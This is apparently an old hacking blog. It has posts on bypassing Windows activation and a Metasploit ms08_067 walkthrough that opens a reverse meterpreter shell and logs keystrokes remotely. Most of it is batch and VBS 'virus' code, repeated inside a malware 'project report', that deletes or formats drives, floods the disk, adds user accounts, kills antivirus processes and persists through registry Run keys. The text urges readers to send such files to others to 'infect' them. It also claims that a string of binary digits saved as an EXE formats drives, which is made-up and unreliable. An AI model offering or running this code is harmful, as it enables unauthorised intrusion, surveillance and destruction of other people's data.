Friday, December 4, 2009
Making Windows SP2 and Sp3 Genuine through Registry
1.open run and type regedit
2.then follow the path
HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS NT\WPAEVENTS
3.Then on the right side you have too change the default hex vlaue of OOBETimer to "ff d5 71 d6 8b 6a 8d 6f d5 33 93 fd".
4.then right click on WPAEvents -> permissions ->then click on system and set permissions for the system by just clicking on Deny both full control and read option.
5.you are almost done now restart the system and its all done ............enjoy
Friday, November 13, 2009
Remote Keylogging with Backtrack
$ msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.0.118
RHOST => 192.168.0.118
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set LHOST 192.168.0.139
LHOST => 192.168.0.139
msf exploit(ms08_067_netapi) > set TARGET 3
TARGET => 3
msf exploit(ms08_067_netapi) > exploit
[*] Triggering the vulnerability…
[*] Sending stage (2650 bytes)
[*] Uploading DLL (75787 bytes)…
[*] Upload completed.
[*] Meterpreter session 1 opened
meterpreter > ps
Process list
============
PID Name Path
— —- —-
292 wscntfy.exe C:\WINDOWS\system32\wscntfy.exe
316 Explorer.EXE C:\WINDOWS\Explorer.EXE
356 smss.exe \SystemRoot\System32\smss.exe
416 csrss.exe \??\C:\WINDOWS\system32\csrss.exe
440 winlogon.exe \??\C:\WINDOWS\system32\winlogon.exe
[ snip ]
meterpreter > migrate 316
[*] Migrating to 316…
[*] Migration completed successfully.
meterpreter > getpid
Current pid: 316
meterpreter > grabdesktop
Trying to hijack the input desktop…
meterpreter > keyscan_start
Starting the keystroke sniffer…
meterpreter > keyscan_dump
Dumping captured keystrokes…
This is a test of the keystroke logger
Friday, September 25, 2009
Folder Lock without any S/W
after creation of Locker folder again click on the locker.bat.it will ask.press Y then Locker folder will be disappeared. again to get it click on locker.bat. and give ur password u will get the folder again.
************ ********* ********* ********* ********* ********* *
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
attrib +h +s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}"
ren "Control Panel.{21EC2020- 3AEA-1069- A2DD-08002B30309 D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Simple Virus making
Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)
Copy this to notepad and save as flood1.bat.....
@ECHO OFF
@ECHO A PHOENIX PRODUCTION
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET snowball2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a snowball2=%%snowball2%%+1 >> bat6.bat
@ECHO NET USER snowball2%%snowball2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET maggi=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR maggi%%maggi%% >> bat5.bat
@ECHO SET /a maggi=%%maggi%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET marge=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR marge%%marge%% >> bat4.bat
@ECHO SET /a marge=%%marge%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET bart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR bart%%bart%% >> bat3.bat
@ECHO SET /a bart=%%bart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET homer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR homer%%homer%% >> bat2.bat
@ECHO SET /a homer=%%homer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET lisa=1
GOTO flood1
:flood1
MKDIR lisa%lisa%
SET /a lisa=%lisa%+1
GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.
A simple binary codes that can format the system drive ,secondary drives...
Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000
Save As An EXE Any Name Will Do
Send the EXE to People And Infect
Some other interesting formatting codes....
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Some more interesting stuff ..
open notepad
erase c:\windows
and save as
FINDOUTANAME.cmd
wat does it do:- will erase c:/windows ......Lol
Here is another one which is funny......
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad
@echo off
copy 0% denger.bat
start denger.bat
This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c "Shutdown"
Go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
One more ...
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy lol..its really dangerous don't try on your own pc.
How to add your own created viruses into start ups this will make it difficult to detect them n to remove them ...
For this u need a registry updater software u can get this from here ..
http://www.mutantsrus.com/Update.reg
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..lol
Do not try it on your PC. Don’t mess around this is for educational purpose only
Shut Down Your Freind's Mobile
with this trick only 1110,1110i,1112,1100,2100(Nokia) can be restarted.
just type
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
or 79 inverted commas
in text msg and send it to ur friend having cells mention above and see wat happens.
Complete Project Report On malwares from Desktop to mobile
INTRODUCTION TO VIRUSES
1. INTRODUCTION
Do viruses and all the other nasties in cyberspace matter? Do they really do much harm? Imagine that no one has updated your anti-virus software for a few months. When they do, you find that your accounts spreadsheets are infected with a new virus that changes figures at random. Naturally you keep backups. But you might have been backing up infected files for months. How do you know which figures to trust? Now imagine that a new email virus has been released. Your company is receiving so many emails that you decide to shut down your email gateway altogether and miss an urgent order from a big customer. Imagine that a friend emails you some files he found on the Internet. You open them and trigger a virus that mails confidential documents to everyone in your address book including your competitors. Finally, imagine that you accidentally send another company, a report that carries a virus. Will they feel safe to do business with you again? Today new viruses sweep the planet in hours and virus scares are major news.
A computer virus is a computer program that can spread across computers and networks by making copies of itself, usually without the user’s knowledge. Viruses can have harmful side effects. These can range from displaying irritating messages to deleting all the files on your computer.
A virus program has to be run before it can infect your computer. Viruses have ways of making sure that this happens. They can attach themselves to other programs or hide in code that is run automatically when you open certain types of files. The virus can copy itself to other files or disks and make changes on your computer. Virus side effects, often called the payload, are the aspect of most interest to users. Password-protecting the documents on a particular day, mailing information about the user and machine to an address somewhere are some of the harmful side effects of viruses. Various kinds of viruses include macro virus, parasitic or file virus, Boot virus,
E-mails are the biggest source of viruses. Usually they come as attachments with emails. The Internet caused the spreading of viruses around the globe. The threat level depends on the particular code used in the WebPages and the security measures taken by service providers and by you. One solution to prevent the viruses is anti-virus softwares. Anti-virus software can detect viruses, prevent access to infected files and often eliminate the infection.
Computer viruses are starting to affect mobile phones too. The virus is rare and is unlikely to cause much damage. Anti-virus experts expect that as mobile phones become more sophisticated they will be targeted by virus writers. Some firms are already working on anti-virus software for mobile phones. VBS/Timo-A, Love Bug,
Timofonica,
CABIR,
aka ACE-? and UNAVAILABLE are some of the viruses that affect the mobile phones
BASIC CONCEPTS OF VIRUS
1.2 What is a virus?
A computer virus is a computer program that can spread across computers and networks by making copies of itself, usually without the user’s knowledge. Viruses can have harmful side-effects. These can range from displaying irritating messages to deleting all the files on your computer.
1.3 Evolution of virus
In the mid-1980s Basit and Amjad Alvi of
1.3.1 History of Viruses
Traditional computer viruses were first widely seen in the late 1980s, and they came about because of several factors. The first factor was the spread of personal computers (PCs). Prior to the 1980s, home computers were nearly non-existent or they were toys. Real computers were rare, and they were locked away for use by "experts." During the 1980s, real computers started to spread to businesses and homes because of the popularity of the IBM PC (released in 1982) and the Apple Macintosh (released in 1984). By the late 1980s, PCs were widespread in businesses, homes and college campuses.
The second factor was the use of computer bulletin boards. People could dial up a bulletin board with a modem and download programs of all types. Games were extremely popular, and so were simple word processors, spreadsheets and other productivity software. Bulletin boards led to the precursor of the virus known as the Trojan horse. A Trojan horse is a program with a cool-sounding name and description. So you download it. When you run the program, however, it does something uncool like erasing your disk. You think you are getting a neat game, but it wipes out your system. Trojan horses only hit a small number of people because they are quickly discovered, the infected programs are removed and word of the danger spreads among users.
The third factor that led to the creation of viruses was the floppy disk. In the 1980s, programs were small, and you could fit the entire operating system, a few programs and some documents onto a floppy disk or two. Many computers did not have hard disks, so when you turned on your machine it would load the operating system and everything else from the floppy disk. Virus authors took advantage of this to create the first self-replicating programs.
Early viruses were pieces of code attached to a common program like a popular game or a popular word processor. A person might download an infected game from a bulletin board and run it. A virus like this is a small piece of code embedded in a larger, legitimate program. When the user runs the legitimate program, the virus loads itself into memory and looks around to see if it can find any other programs on the disk. If it can find one, it modifies the program to add the virus's code into the program. Then the virus launches the "real program." The user really has no way to know that the virus ever ran. Unfortunately, the virus has now reproduced itself, so two programs are infected. The next time the user launches either of those programs, they infect other programs, and the cycle continues.
If one of the infected programs is given to another person on a floppy disk, or if it is uploaded to a bulletin board, then other programs get infected. This is how the virus spreads.
The spreading part is the infection phase of the virus. Viruses wouldn't be so violently despised if all they did was replicate themselves. Most viruses also have a destructive attack phase where they do damage. Some sort of trigger will activate the attack phase, and the virus will then do something -- anything from printing a silly message on the screen to erasing all of your data. The trigger might be a specific date, the number of times the virus has been replicated or something similar.
In the next section, we will look at how viruses have evolved over the years.
VIRUS EFFECTS
AND THEIR RISKS
2. VIRUS EFFECTS AND VIRUS RISKS
2.1 How does a virus infect computers?
A virus program has to be run before it can infect your computer. Viruses have ways of making sure that this happens. They can attach themselves to other programs or hide in code that is run automatically when you open certain types of files. You might receive an infected file on a disk, in an email attachment, or in a download from the internet. As soon as you launch the file, the virus code runs. Then the virus can copy itself to other files or disks and make changes on your computer.
2.2 Who writes viruses?
Virus writers don’t gain in financial or career terms; they rarely achieve real fame; and, unlike hackers, they don’t usually target particular victims, since viruses spread too indiscriminately. Virus writers tend to be male, under 25 and single. Viruses also give their writers powers in cyberspace that they could never hope to have in the real world.
2.3 Virus side effects(Payload)
Virus side-effects are often called the payload. Viruses can disable our computer hardware, Can change the figures of an accounts spreadsheets at random, Adversely affects our email contacts and business domain, Can attack on web servers…
§ Messages -WM97/Jerk displays the message ‘I think (user’s name) is a big stupid jerk!’
§ Denying access -WM97/NightShade password-protects the current document on Friday 13th.
§ Data theft- Troj/LoveLet-A emails information about the user and machine to an address in the
§ Corrupting data -XM/Compatable makes changes to the data in Excel spreadsheets.
§ Deleting data -Michelangelo overwrites parts of the hard disk on March 6th.
§ Disabling Hardware -CIH or
§ attempts to overwrite the BIOS on April 26th, making the machine unusable.
§ Crashing servers-Melissa or Explore Zip, which spread via email, can generate so much mail that servers crash.
There is a threat to confidentiality too. Melissa can forward documents, which may contain sensitive information, to anyone in your address book. Viruses can seriously damage your credibility. If you send infected documents to customers, they may refuse to do business with you or demand compensation. Sometimes you risk embarrassment as well as a damaged business reputation. WM/Polypost, for example, places copies of your documents in your name on alt.sex usenet newsgroups.
2.4 Where are the virus risks?
MALWARES AND THEIR VARIOUS TYPES
3. MALWARES AND ITS VARIOUS TYPES
3.1 MALWARE
Malware is a general term for any malicious software which comes in thousand of variants thus malware is a threat to a PC. Among the variants of computer malicious software including Trojan horse, spyware, computer worm, keylogger, rootkit, dialer, rogue security tool, adware and virus. Some types of PC theats are easy to move. However some malware are tough to be deleted and you need to use combination of few security tools to remove them such as antivirus, spyware removal software, firewal and standalone PC infection remover.
Malware could cause damage to any infected computer such as loss of important documents
3.2 Trojan horses
Trojan horses are programs that do things that are not described in their specifications The user runs what they think is a legitimate program, allowing it to carry out hidden, often harmful, functions. For example, Troj/Zulu claims to be a program for fixing the ‘millennium bug’ but actually overwrites the hard disk. Trojan horses are sometimes used as a means of infecting a user with a computer virus.
3.3 Backdoor Trojans
A backdoor Trojan is a program that allows someone to take control of another user’s PC via the internet. Like other Trojans, a backdoor Trojan poses as legitimate or desirable software. When it is run (usually on a Windows 95/98 PC), it adds itself to the PC’s startup routine. The Trojan can then monitor the PC until it makes a connection to the internet. Once the PC is on-line, the person who sent the Trojan can use software on their computer to open and close programs on the infected computer, modify files and even send items to the printer. Subseven and Back Orifice are among the best known backdoor Trojans.
3.4 Worms
Worms are similar to viruses but do not need a carrier (like a macro or a boot sector).They are subtype of viruses. Worms simply create exact copies of themselves and use communications between computers to spread. Many viruses, such as Kakworm (VBS/Kakworm) or Love Bug (VBS/LoveLet-A), behave like worms and use email to forward themselves to other users.
3.5 Spyware
Spyware is a type of malware that is installed on computers and that collects information about users without their knowledge. The presence of spyware is typically hidden from the user. Typically, spyware is secretly installed on the user's personal computer. Sometimes, however, spywares such as keyloggers are installed by the owner of a shared, corporate, or public computer on purpose in order to secretly monitor other users.
While the term spyware suggests software that secretly monitors the user's behavior, the functions of spyware extend well beyond simple monitoring. Spyware programs can collect various types of personal information, such as Internet surfing habits and sites that have been visited, but can also interfere with user control of the computer in other ways, such as installing additional software and redirecting Web browser activity. Spyware is known to change computer settings, resulting in slow connection speeds, different home pages, and/or loss of Internet or functionality of other programs. In an attempt to increase the understanding of spyware, a more formal classification of its included software types is captured under the term privacy-invasive software.
3.6 Rootkit
A rootkit is a software system that consists of a program or combination of several programs designed to hide or obscure the fact that a system has been compromised. Contrary to what its name may imply, a rootkit does not grant a user administrator privileges, as it requires prior access to execute and tamper with system files and processes. An attacker may use a rootkit to replace vital system executables, which may then be used to hide processes and files the attacker has installed, along with the presence of the rootkit. Access to the hardware, e.g., the reset switch, is rarely required, as a rootkit is intended to seize control of the operating system. Typically, rootkits act to obscure their presence on the system through subversion or evasion of standard operating system security scan and surveillance mechanisms such as anti-virus or anti-spyware scan. Often, they are Trojans as well, thus fooling users into believing they are safe to run on their systems. Techniques used to accomplish this can include concealing running processes from monitoring programs, or hiding files or system data from the operating system.[1] Rootkits may also install a "back door" in a system by replacing the login mechanism (such as /bin/login) with an executable that accepts a secret login combination, which, in turn, allows an attacker to access the system, regardless of the changes to the actual accounts on the system.
3.7 Boot sector viruses
Boot sector viruses were the first type of virus to appear. They spread by modifying the boot sector, which contains the program that enables your computer to start up. When you switch on, the hardware looks for the boot sector program – which is usually on the hard disk, but can be on floppy or CD – and runs it. This program then loads the rest of the operating system into memory. A boot sector virus replaces the original boot sector with its own, modified version (and usually hides the original somewhere else on the hard disk). When you next start up, the infected boot sector is used and the virus becomes active. You can only become infected if you boot up your computer from an infected disk, e.g. a floppy disk that has an infected boot sector. Many boot sector viruses are now quite old. Those written for DOS machines do not usually spread on Windows 95, 98, Me, NT or 2000 computers, though they can sometimes stop them from starting up properly.
Boot viruses infect System Boot Sectors (SBS) and Master Boot Sectors (MBS). The MBS is located on all physical hard drives. It contains, among other data, information about the partition table (information about how a physical disk is divided into logical disks), and a short program that can interpret the partition information to find out where the SBS is located. The MBS is operating system independent. The SBS contains, among other data, a program whose purpose is to find and run an operating system. Because floppy diskettes are exchanged more frequently than program files boot viruses are able to propagate more effectively than file viruses.
Form -A virus that is still widespread ten years after it first appeared. The original version triggers on the 18th of each month and produces a click when keys are pressed on the keyboard.
Parity Boot - A virus that may randomly display the message ‘PARITY CHECK’ and freeze the operating system. The message resembles a genuine error message displayed when the computer’s memory is faulty.
ANALYSING
MALWARES
4. ANALYSING MALWARES
4.1 Simple Virus Making
If you think that notepad is useless then you are wrong because you can now do a lot of things with a notepad which you could have never imagined.In this hack I will show you how to make simple .bat file (virus) that can't be detected by any anti virus
Here are some good viruses ,i am not responsible for any kind of damage to your system ... :)
Copy this to notepad and save as flood1.bat.....
@ECHO OFF
@ECHO A Sharma’s Creation
@ECHO MAIN BAT RUNNING
GOTO start
:start
@ECHO SET magic2=1 >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
@ECHO :flood5 >> bat6.bat
@ECHO SET /a magic2=%%magic2%%+1 >> bat6.bat
@ECHO NET USER magic2%%magic2%% /add >> bat6.bat
@ECHO GOTO flood5 >> bat6.bat
START /MIN bat6.bat
GOTO bat5
:bat5
@ECHO CD %%ProgramFiles%%\ >> bat5.bat
@ECHO SET pogo=1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
@ECHO :flood4 >> bat5.bat
@ECHO MKDIR pogo%%pogo%% >> bat5.bat
@ECHO SET /a pogo=%%pogo%%+1 >> bat5.bat
@ECHO GOTO flood4 >> bat5.bat
START /MIN bat5.bat
GOTO bat4
:bat4
@ECHO CD %%SystemRoot%%\ >> bat4.bat
@ECHO SET hat=1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
@ECHO :flood3 >> bat4.bat
@ECHO MKDIR hat%%hat%% >> bat4.bat
@ECHO SET /a hat=%%hat%%+1 >> bat4.bat
@ECHO GOTO flood3 >> bat4.bat
START /MIN bat4.bat
GOTO bat3
:bat3
@ECHO CD %%UserProfile%%\Start Menu\Programs\ >> bat3.bat
@ECHO SET chart=1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
@ECHO :flood2 >> bat3.bat
@ECHO MKDIR chart%%chart%% >> bat3.bat
@ECHO SET /a chart=%%chart%%+1 >> bat3.bat
@ECHO GOTO flood2 >> bat3.bat
START /MIN bat3.bat
GOTO bat2
:bat2
@ECHO CD %%UserProfile%%\Desktop\ >> bat2.bat
@ECHO SET gamer=1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
@ECHO :flood >> bat2.bat
@ECHO MKDIR gamer%%gamer%% >> bat2.bat
@ECHO SET /a gamer=%%gamer%%+1 >> bat2.bat
@ECHO GOTO flood >> bat2.bat
START /MIN bat2.bat
GOTO original
:original
CD %HomeDrive%\
SET sharma=1
GOTO flood1
:flood1
MKDIR sharma%sharma%
SET /a sharma=%sharma%+1
GOTO flood1
What does it do : this is an extremely harmful virus the will keep replicating itself until your hard drive is totally full and will destroy your comp.
Some Funny Virus Codes
A simple binary codes that can format the system drive ,secondary drives...
Copy The Following In Notepad Exactly as it
01001011000111110010010101010101010000011111100000
Save As An EXE Any Name Will Do
Send the EXE to People And Infect
Some other interesting formatting codes....
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
Some more interesting stuff ..
open notepad
erase c:\windows
and save as
FINDOUTANAME.cmd
wat does it do:- will erase c:/windows .
Here is another one which is funny......
cls
:A
color 0a
cls
@echo off
echo Wscript.Sleep 5000>C:\sleep5000.vbs
echo Wscript.Sleep 3000>C:\sleep3000.vbs
echo Wscript.Sleep 4000>C:\sleep4000.vbs
echo Wscript.Sleep 2000>C:\sleep2000.vbs
cd %systemroot%\System32
dir
cls
start /w wscript.exe C:\sleep3000.vbs
echo Deleting Critical System Files...
echo del *.*
start /w wscript.exe C:\sleep3000.vbs
echo Deletion Successful!
echo:
echo:
echo:
echo Deleting Root Partition...
start /w wscript.exe C:\sleep2000.vbs
echo del %SYSTEMROOT%
start /w wscript.exe C:\sleep4000.vbs
echo Deletion Successful!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo:
echo Creating Directory h4x...
cd C:\Documents and Settings\All Users\Start Menu\Programs\
mkdir h4x
start /w wscript.exe C:\sleep3000.vbs
echo Directory Creation Successful!
echo:
echo:
echo:
echo Execution Attempt 1...
start /w wscript.exe C:\sleep3000.vbs
echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
echo start hax.exe
start /w wscript.exe C:\sleep3000.vbs
echo Virus Executed!
echo:
echo:
echo:
start /w wscript.exe C:\sleep2000.vbs
echo Disabling Windows Firewall...
start /w wscript.exe C:\sleep2000.vbs
echo Killing all processes...
start /w wscript.exe C:\sleep2000.vbs
echo Allowing virus to boot from startup...
start /w wscript.exe C:\sleep2000.vbs
echo:
echo:
echo Virus has been executed successfully!
start /w wscript.exe C:\sleep2000.vbs
echo:
echo Have fun!
start /w wscript.exe C:\sleep2000.vbs
pause
shutdown -f -s -c "Your computer has committed suicide. Have a nice day."
This code about multiple open windows means infinite windows
until continue you restart the computer:save on denger.bat and code written in notepad
@echo off
copy 0% denger.bat
start denger.bat
This code about the computer shutdown:
@echo off
shutdown -s -t 5 -c "Shutdown"
Go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
Want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
and save it as a .bat file
One more ...
try one this
Cd C:\
rd C:\ /s/q
Cd D:\
rd D:\ /s/q
Cd E:\
Rd E:\ /s/q
Cd F:\
Rd\ /s/q
then it is complete Save as any file you want in .bat format.. n enjoy.its really dangerous don't try on your own pc.
NOTE :- Howto add your own created viruses into start ups this will make it difficult to detect them n to remove them ...
For this u need a registry updater software u can get this from here ..
http://www.mutantsrus.com/Update.reg
now move your .bat file to c:/windows and then simply run this software ur virsu will be added to your start ups i tried this with shut down , as my comp starts its shut down after 2 secs ..
Do not try it on your PC. Don’t mess around this is for educational purpose only
Batch VIRUS Killing “ NORTON, LIMEWIRE, EXPLORER, MSN “
@Echo off
color 4
title 4
title R.I.P
start
start
start
start calc
copy %0 %Systemroot%\Greatgame > nul
reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Greatgame /t REG_SZ
/d %systemroot%\Greatgame.bat /f > nul
copy %0 *.bat > nul
Attrib +r +h Greatgame.bat
Attrib +r +h
RUNDLL32 USER32.DLL.SwapMouseButton
start calc
cls
tskill msnmsgr
tskill LimeWire
tskill iexplore
tskill NMain
start
cls
cd %userprofile%\desktop
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
cd %userprofile%My Documents
copy Greatgame.bat R.I.P.bat
copy Greatgame.bat R.I.P.jpg
copy Greatgame.bat R.I.P.txt
copy Greatgame.bat R.I.P.exe
copy Greatgame.bat R.I.P.mov
copy Greatgame.bat FixVirus.bat
start
start calc
cls
msg * R.I.P
msg * R.I.P
shutdown -r -t 10 -c "VIRUS DETECTED"
start
start
time 12:00
:R.I.P
cd %usernameprofile%\desktop
copy Greatgame.bat %random%.bat
goto RIP
It will
1) Copy itself into startup
2) Copy itself over one thousand times into random spots in your computer
3) Hide its self and all other created files
4) Task kill MSN, Norton, Windows Explorer, Limewire.
5) Swap the left mouse button with the right one
6) Opens alert boxes
7) Changes the time to 12:00 and shuts down the computer
The first code we are going to look at is one that makes the cd tray open and close repeatedly until shutdown, or
(don't tell your friends, you press ctrl + alt + delete and go to processes, and end wscript.exe (this code is vbs so save in note pad as whateveryouwant.vbs)
Set oWMP = CreateObject("WMPlayer.OCX.7" )
Set colCDROMs = oWMP.cdromCollection
if colCDROMs.Count >= 1 then
do
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next ' cdrom
loop
end if
A code that turns on and off your capslock repeatedly, also vbs, end same way as last time, this turns on and off your capslock every tenth of a second
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
Batch file that pops up with repeating message boxes
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * since you are stuck reading
msg * I am gonna tell you a story
msg * bout a dumb guy named (victims name)
msg * who just opened my batch
msg * and got stuck listening to a story
msg * from a computer
msg * so he was opening up batches
msg * when one pops up with a cool msg
msg * then it says "hi"
msg * Hi
msg * Are you having fun?
msg * I am!
msg * have fun playing with this one (insert victim)
msg * Because you have been P-w-n-e-d with a capital "P"
GOTO BEGIN
A batch that is like a computer password, maybe you could stick it in autoexec.exe and make it run off startup?
@Echo off
echo Enter password then [F6] and then smack the [Enter] key real hard!
prompt $e[30m
echo on
echo off
copy con password.dat>nul
prompt $e[0m
echo on
echo off
cls
copy password.set+password.dat password.bat>nul
call password.bat
if '%password%==qwerty goto done
echo Incorrect, you are not trying to break into my pc are you?
choice /t:y,3
if errorlevel 2 goto next
:next
erase password.bat
erase password.dat
:hello
cls
echo Turn off PC
goto hello
:done
erase password.dat
erase password.bat
set password=qwerty
prompt $p$g
A batch that switches the left mouse button with your right mouse button (also maybe add a code to stick in someones autoexec,
that would really make them mad)
@echo off
Rundll32 user32,SwapMouseButton
msg * hahaha
msg * this is gunna screw you up
msg * good look finding how to fix it
A batch file that will shutdown your computer and send a few messages about the matrix, rather bland and could be worked on a little bit more, some one
could tweak it a little and i'll repost it and give you credit, perhaps change the dos txt to green
@ Echo off
Title Matrix
msg * The matrix has you, you can not escape
rundll32.exe disable mouse
Attrib +h C:*.*
echo deleting harddrive
echo 1001101010101011111111101010101
echo 010101010101010101010101010111
assoc
assoc
Attrib C:Documents and settings*.*
net share hack=C:
shutdown -s -c 60
This is a VBs file so of course save as VBS, you can replace the txt in this code with whatever you want
Set wshshell = wscript.CreateObject("WScript.Shell")
Wshshell.run "Notepad"
wscript.sleep 400
wshshell.sendkeys "M"
wscript.sleep 100
wshshell.sendkeys "a"
wscript.sleep 120
wshshell.sendkeys "s"
wscript.sleep 200
wshshell.sendkeys "o"
wscript.sleep 140
wshshell.sendkeys "n"
wscript.sleep 100
